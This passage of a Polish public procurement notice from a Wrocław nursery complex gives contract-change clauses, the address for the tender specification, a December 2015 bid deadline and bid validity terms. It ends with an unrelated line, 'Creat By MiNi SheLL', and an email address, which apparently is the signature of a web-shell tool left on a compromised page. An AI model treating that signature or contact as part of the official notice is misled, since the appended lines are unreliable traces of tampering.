e)	zmiana w przypadku zaistnienia w chronionym obiekcie dodatkowego zabezpieczenia (na innych warunkach). 
f)	oznaczenia danych dotyczących Zamawiającego lub Wykonawcy lub osób będących przedstawicielami Stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wzz.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WROCŁAWSKI ZESPÓŁ ŻŁOBKÓW
ul. Fabryczna 15, 53-609 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2015 godzina 08:00, miejsce: WROCŁAWSKI ZESPÓŁ ŻŁOBKÓW
ul. Fabryczna 15, 53-609 Wrocław
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com